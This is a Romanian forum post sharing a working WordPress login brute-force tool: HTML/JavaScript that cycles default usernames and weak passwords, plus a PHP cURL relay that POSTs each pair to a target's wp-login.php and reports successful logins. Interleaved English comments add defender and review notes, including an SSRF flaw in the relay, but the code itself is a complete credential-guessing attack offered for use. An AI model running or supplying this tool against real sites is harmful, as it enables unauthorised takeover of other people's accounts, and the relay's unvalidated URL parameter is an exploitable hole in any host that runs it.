dancezar

Wordpress burteforce


Ieri seara am facut un wp-bruteforce simplu folosind JavaScript si putin PHP (doar pentru cURL) si m-am gandit sa il impart cu voi :D.

index.html (asta face tot:) )


<!-- Input form: base URL of the WordPress site, an optional single username with its checkbox, and a GO!/Stop toggle. -->
<!-- The button's inline handler calls start() while it reads "GO!" and sets the global work flag to 0 while it reads "Stop". -->
<!-- The #st div is the status line that the script below writes progress into. -->
<label>Url:</label><input type="text" id="u" /><br>
<label>Single user:</label><input type="text" id="s" /><input type="checkbox" id="single" />
<input type="button" value="GO!" onclick="if(this.value=='GO!'){start();this.value='Stop';}else{work=0;this.value='GO!';}" />
<div id="st"></div>
<script>

// Candidate usernames used when the "Single user" box is not ticked.
// Defender note: these are common default account names, so a run of failed
// logins cycling through names like these is a recognisable pattern in
// wp-login.php access logs. Avoiding such account names and enforcing login
// throttling or lockout removes most of the exposure.
var users=Array("admin"
,"user"
,"sysadmin"
,"system"
,"administrator"
,"blog"
,"webmaster"
);
// Candidate passwords, tried in list order for each username.
// Defender note: every entry is a short, widely known weak password. A
// password policy that rejects known-weak values, together with MFA on
// administrative accounts, defeats a list of this kind.
var pass=Array("123456"
,"pa$$word"
,"admin"
,"admin123"
,"administrator"
,"qwerty"
,"qwerty1234"
,"andrei123"
);
// Target base URL taken from the Url input.
var url=document.getElementById('u').value;
// Status element that progress text is written into.
var sa=document.getElementById('st');
// Username for single-user mode; start() sets it to "-" when that mode is off.
var single_user;
// Current indexes into users[] and pass[].
var contor_user;
var contor_pass;
// Lengths of users[] and pass[], captured by start().
var total_u;
var total_p;
// Run flag: 1 while a run is active, 0 once stopped.
var work;
// Number of attempts made so far, used only for the progress text.
var cont_incercari;
// One XMLHttpRequest object shared by every request (assigned without var,
// so it is an implicit global). Requests are therefore issued one at a time.
http=new XMLHttpRequest();
// Resets all counters and state, then sends the first request.
// With the "single" checkbox ticked, the username typed into the "s" field is
// paired with the first password; otherwise the first entry of users[] is.
// All later requests are driven from trateaza() as each response arrives.
function start(){
// "-" is the sentinel meaning "single-user mode is off".
single_user="-";
cont_incercari=0;
contor_user=0;
contor_pass=0;
total_u=users.length;
total_p=pass.length;
work=1;
if(document.getElementById('single').checked){
single_user=document.getElementById('s').value;
make_get(single_user,pass[0]);
}else{
make_get(users[0],pass[0]);
}
}
// Sends one username/password pair to the get.php relay on this page's own
// origin and calls trateaza() when the response is complete.
// The relay is presumably needed because the browser cannot read a
// cross-origin login response directly; the consequence for defenders is that
// the target site sees the PHP host's IP address, not the operator's browser.
// NOTE(review): the credentials travel in the GET query string, so every pair
// tried is written to the relay host's web server access log. That log is a
// useful forensic artifact if such a host is seized or found compromised.
function make_get(user,pass){
http.open("GET", "get.php?url="+url+"&user="+user+"&pass="+pass, true);
http.overrideMimeType('text/html; charset=UTF-8');
http.onreadystatechange = function() {
// readyState 4 means the response has been fully received.
if (http.readyState == 4) {
trateaza();
}
}
http.send(null);
}
// Handles one relay response ("trateaza" is Romanian for "handle"/"process").
// Does nothing unless the run flag is 1. A response containing the
// "<strong>ERROR</strong>" marker counts as a failed login: the counters
// advance and the next request is sent. A response without the marker is
// reported as a hit through alert(); no other check is made.
// Defender note: the loop sends exactly one request per response and never
// pauses, so it shows up as a steady serial stream of login POSTs from one
// source. Per-IP and per-account throttling on wp-login.php targets that
// pattern directly.
function trateaza(){
// Response body from the relay (assigned without var, so an implicit global).
sursa=http.responseText;
if(work==1){
if(sursa.search("<strong>ERROR</strong>")>-1){
// Single-user mode: only the password index advances.
if(single_user!="-"){
if(contor_pass<total_p){
contor_pass++;
cont_incercari++;
sa.innerHTML="Incerc "+(cont_incercari+1)+"/"+total_p;
make_get(single_user,pass[contor_pass]);
}else{
alert("Stop");
work=0;
}

}else{
// List mode: step through the passwords, then move to the next username.
if(contor_pass<total_p){
contor_pass++;
cont_incercari++;
}else if(contor_user<total_u){
contor_pass=0;
contor_user++;
cont_incercari++;
}else{
alert("Stop");
work=0;
}
sa.innerHTML="Incerc "+(cont_incercari+1)+"/"+(total_p*total_u);
make_get(users[contor_user],pass[contor_pass]);
}
}else{
// No error marker in the response: show the pair at the current indexes.
alert(users[contor_user]+"::"+pass[contor_pass]);
}
}
}
</script>

get.php


<?php
// Server-side relay: POSTs the supplied username/password to
// <url>/wp-login.php and echoes the login page's response to the caller.
//
// NOTE(review): every input comes from $_REQUEST and is used without
// validation. The 'url' parameter picks the destination of the outbound
// request, so anyone who can reach this script can make the host send POSTs
// to arbitrary addresses, internal ones included (an SSRF / open-relay
// exposure for whoever hosts the file).
// NOTE(review): no CURLOPT_USERAGENT is set, so the outbound requests probably
// carry no browser-like User-Agent header. TODO confirm; if so, that is a
// simple detection signal on the receiving site.
$curl = curl_init($_REQUEST['url'].'/wp-login.php');
// Return the response as a string instead of printing it directly.
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
// Cookies are stored in and read from c.txt in the working directory, a
// single jar shared by all requests. NOTE(review): if that directory is
// web-served, the cookie file can be downloaded by anyone.
curl_setopt($curl,CURLOPT_COOKIEJAR,"c.txt");
curl_setopt($curl,CURLOPT_COOKIEFILE,"c.txt");
// Follow redirects returned by the login endpoint.
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,TRUE);
// Login form fields, built by plain string concatenation from request input.
curl_setopt($curl,CURLOPT_POSTFIELDS,"log=".$_REQUEST['user']."&pwd=".$_REQUEST['pass']."&wp-submit=Log+In&redirect_to=".$_REQUEST['url']."/wp-admin/&testcookie=0");
$a = curl_exec($curl);
// NOTE(review): the remote HTML is echoed verbatim under this host's origin,
// so any script in the fetched page runs in the relay's origin in the
// caller's browser.
echo $a;
?>

Pentru un anumit user completati Single user: si bifati casuta.

l-am testat pe firefox ultima versiune cred.

Seara buna.

Edited by danyweb09
Am scris burteforce in loc de bruteforce:))